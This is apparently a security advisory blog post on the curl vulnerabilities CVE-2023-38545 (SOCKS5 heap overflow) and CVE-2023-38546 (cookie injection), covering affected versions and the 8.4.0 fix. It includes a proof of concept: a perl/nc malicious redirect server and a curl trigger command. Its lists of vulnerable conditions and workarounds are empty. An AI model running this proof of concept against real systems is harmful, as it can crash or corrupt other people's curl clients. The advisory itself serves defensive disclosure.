As referenced in our previous post, the software development world has been bracing for additional details regarding two vulnerabilities associated with cURL, one of which was assessed as critical by the maintainer and original creator of the project. The wait ended this morning, as a fixed version was released and details about the vulnerabilities were provided.
The first and more severe vulnerability, CVE-2023-38545, addresses a buffer overflow flaw that impacts both libcurl and the curl command line tool. The overflow can occur during a SOCKS5 handshake. If the handshake is slow, a user-supplied, unusually long hostname may not be resolved, and instead be copied into a target buffer for which it may exceed the allocated size. Heap-based buffer overflows such as these are known to lead to crashes, data corruption, and even arbitrary code execution.
This vulnerability impacts only applications that are instrumenting client/server communication using the SOCKS internet protocol. Although use of SOCKS is not unheard of or even rare, this condition does significantly reduce the impact of the vulnerability across the countless internet-connected devices that depend on curl.
CVE-2023-38545 impacts curl versions 7.69.0 through and including 8.3.0. The version released today, 8.4.0, completely addresses the risk of a buffer overflow by returning an error when a hostname exceeds 255 bytes, which is the specific trigger of the overflow. Curl is urging teams to upgrade immediately, especially if they do not already have hostname restrictions in place. For teams that cannot immediately upgrade to the fixed version, curl suggests some workarounds.
We’ve provided more details regarding the vulnerability and exploit conditions below.
Check the following conditions to determine if an instance of curl is vulnerable.
For the curl CLI tool, all the following must be true:
For the libcurl library, all the following must be true:
Even if these vulnerable configurations are present, additional requirements are still necessary for the vulnerability to be triggered.
A proof-of-concept for this issue is shown below. An attacker must be able to run a SOCKS5 proxy on a remote IP address to create the required latency.
First, simulate a malicious attacker HTTP redirect server with the following command:
$ while true; do { perl -e 'print ("HTTP/1.1 301 Moved\r\nContent-Length: 0\r\nConnection: Close\r\nLocation: http://");print("A"x65535);print("\r\n\r\n")'; sleep 2; } | nc -4l [yourip] 8000; done
Then, trigger the vulnerability with this command:
$ curl -v --limit-rate 1024 --location --proxy socks5h://[remoteip]:1080 http://[yourip]:8000
Versions 7.69.0 up to and including version 8.3.0 are vulnerable, but it should be noted that 7.x versions have fewer preconditions required for a vulnerable configuration, namely less hostname length restrictions and a target buffer size that cannot be overwritten by CURLOPT_BUFFERSIZE.
Successful exploitation of this vulnerability results in memory corruption of the curl client process. This corruption can lead to reading an invalid address, triggering an access violation, and causing denial-of-service by crashing the process. It is theorized that this memory corruption could potentially be weaponized to achieve remote code execution, but this has not yet been demonstrated.
The vulnerability is fixed in version 8.4.0 by this commit.
The curl maintainers have suggested the following workarounds:
Also supplied are a set of patches that can be applied directly to historic versions if an upgrade is not feasible.
A less severe vulnerability was disclosed that impacts only libcurl. CVE-2023-38546 is associated with a cookie injection flaw, but curl maintainers suggest that the series of conditions that must be met makes the likelihood of exploitation low. The versions impacted by this vulnerability are 7.9.1 through and including 8.3.0. Upgrading to curl 8.4.0 resolves the issue. Users are also advised to call curl_easy_setopt(cloned_curl, CURLOPT_COOKIELIST, "ALL"); after every call to curl_easy_duphandle();.
Synopsys Black Duck® Security Advisories provide customers with in-depth analysis of vulnerabilities in open source products, combining a range of available information with regular reviewing and monitoring to ensure accurate coverage. These advisories contain the details necessary to understand, prioritize, and remediate vulnerabilities within the context of your applications, and they’re normally published well in advance of the corresponding CVE analysis, if a CVE ID has been allocated.